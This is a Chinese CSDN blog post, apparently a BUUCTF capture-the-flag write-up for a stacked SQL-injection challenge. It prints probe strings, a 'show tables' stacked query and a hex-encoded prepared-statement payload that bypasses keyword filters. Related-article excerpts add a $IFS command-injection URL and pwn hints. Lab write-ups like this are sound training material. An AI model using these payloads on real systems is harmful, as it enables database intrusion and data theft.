BUUCTF

最新推荐文章于 2025-03-30 19:04:54 发布

江湖人称皮的很

最新推荐文章于 2025-03-30 19:04:54 发布

阅读量903

点赞数 2

CC 4.0 BY-SA版权

分类专栏： CTF

本文链接：https://blog.youkuaiyun.com/qq_18669681/article/details/98877332

CTF 专栏收录该内容

1 篇文章

订阅专栏

本文详细探讨了SQL注入的基本原理及技巧，包括如何通过常见关键词的过滤进行堆叠注入，查询表名、字段及表内容的方法。同时，文章也提到了在实际操作中遇到的关键词过滤挑战，并分享了具体的应对策略。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

随便注

根据题目判断就初步判断为注入。
但还是测试
1. ‘ 报错
2.’ or ‘’=’ 回显正常
尝试进行注入时发现对注入的常用关键词都进行了过滤。
在这里插入图片描述
进行堆叠注入查询表名

1';show tables;

查询字段

show coloums from

查询表的内容有多种方法，我使用的是多语句执行。

1';Set @x=0x73656c65637420666c61672066726f6d206031393139383130393331313134353134603b;Prepare a from @x;execute a;%23

堆叠注入

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

江湖人称皮的很

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

buucft web (exec)

a34376764的博客

03-20

672

BUUCTF Crypto 解题记录：MD5

最新发布

2301_81168922的博客

05-19

565

由于无法直接推测盐值或哈希次数，需结合题目提示进一步分析。）直接查询题目给出的 34 位字符串，结果显示。MD5 对相同明文始终生成相同哈希，但可能存在。：与题目中前 32 位完全一致。

参与评论您还未登录，请先登录后发表或查看评论

buuctf

灰太的表格的博客

06-14

698

[GXYCTF2019]Ping Ping Ping ![猜测为命令拼接尝试?ip=127.0.0.1 果然是，开始构造发现空格flag被ban ${IFS} $IFS$9 < <> linux中可以用来代替空格可以用变量拼接解决flag字符串被ban http://0022d670-8595-4aa7-bfaf-a72fbb8e84d9.node3.buuoj.cn/?ip=127.0.0.1;a=g;cat$IFS$9fla$a.php flag在源代码里 ...

Buuctf

qq_52761202的博客

08-20

330

Http F12,发现Secret.php 访问 referer:https://www.Sycsecret.com User-Agent:Syclover browser 本地访问：127.0.0.1 开伪代理 Easy calc 看一下页面源码，发现了提示： calc.php?num=encodeURIComponent($("#content").val()) $("#content").val() 是什么意思：获取id为content的HTML标签元素的值,是JQuery, $("#

BUUCTF(PWN)

fanshaoze的博客

09-27

448

查看我们main函数，发现这里只有system函数和/bin/sh，不存在栈溢出，终端直接nc就行。

buuctf（pwn）

个人笔记

04-04

3319

一日一PWN/REpwn1_sctf_2016 实践是检验真理的唯一标准。 pwn1_sctf_2016 1.找到漏洞的利用点往往才是困难点。(直接F5看看反汇编) 发现两个可以函数跟进去看看 2.这里对反汇编出来的Vuln理解了半天（本还想从汇编直接分析，不过进展收获不大，欢迎有兴趣的朋友一起交流），下面还是从伪代码分析。通过这几行能看出最后A变成了B。即把YOU 换成了I。因为上面是S的溢出点是3C，可fgets之读取了32并不会超过3C，但函数会把一个32个I换成32个YOU就达到了溢出点。 3.

BUUCTF（变异凯撒）

Bigotry77的博客

07-26

2021

小白看到题目的第一眼应该是没有思路，（我指的是纯小白）我看到这个txt中的文本时就自动把afZ_和flag{}对上了。。。然后再看，偏移量？肯定不是，字母对不上，再看ASCII a, f, Z, _的ASCII码是 97， 102， 90， 95 而再看这里flag的ASCII码是102，108，97，103；每个对应的都会相差5，可以自己推，不过感觉比较麻烦。。。然后用python写个脚本：（借鉴的） def b_kaisa(str): first_step = 5 #首..

buuctf(入门) Have Fun

qq_64501184的博客

11-27

604

havefun

BUUCTF（刷题日记）

weixin_74022830的博客

03-23

1173

BUUCTFweb刷题记录

web buuctf [WUSTCTF2020]朴实无华

weixin_44214568的博客

04-01

524

1. 根据提示消息应该在头部 2.查看robots.txt (搜索引擎中访问网站的时候要查看的第一个文件) 访问 3.根据头部查看请求头和响应头 4.查看，打开网页里面对汉字的编译是乱码，在火狐浏览器中定制工具里有一个页面编辑的选项，对页面进行编辑，得到源码： <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //...

buuctf——（ACTF）rome

yhfgs的博客

05-24

1050

1.下载得到rome.exe,丢到DIE中查壳，无壳，32位文件。 2.丢到IDA中，找到main，F5. 3.分析代码，其主要内容在两个while循环中（从定义中可知flag位16个字符）。看第二个循环，可知是比较result和经过第一个循环得到的v1比较（就是flag经过第一个循环后变成了result（v12））并且可以从开头看出v12=Qsw3sj_lz4_Ujw@l。再看第一个循环，发现是凯撒密码（看了老半天），大写字母平移12位，小写字母平移8位，其他字符不变。直接上脚本（

BUUCTF(5)

遇事不决冲冲冲

02-28

3107

[CISCN 2019 初赛]Love Math 1 [De1CTF 2019]SSRF Me 1

【buuctf】Basic(上)

「我唯一会的和擅长的只有网络安全，如果我不能在我最擅长的事情上取得成功，那么我根本不知道，我的人生还有什么意义。」

03-30

1047

求知若渴，虚心若愚

BUUCTF：黑客帝国

末初 · mochu7

11-01

5734

题目地址：https://buuoj.cn/challenges#%E9%BB%91%E5%AE%A2%E5%B8%9D%E5%9B%BD 开头很像RAR文件的十六进制数据，利用脚本将这些数据以二进制流形式写入文件

buuctf [BJDCTF 2nd]one_gadget

carol2358的博客

04-18

646

libc可以在buuctf上下载。本题会泄漏printf的地址 14位，所以不用u64，u64用在6个字节的字符串上，改用int int - int one用one_gadget libc找，通过调试运行到call rdx，然后x/gx rdx的地址之类的，来确定里面的值也可以不用info直接看到发现最后一个是可行的 exp: from pwn import * from L...

BUUCTF——Basic

计算机硕士的博客

06-16

2425

BUUCTF——Basic(详细版)，包括了做题思路和详细步骤。Linux Labs、BUU LFI COURSE 1、BUU BRUTE 1、BUU SQL COURSE 1。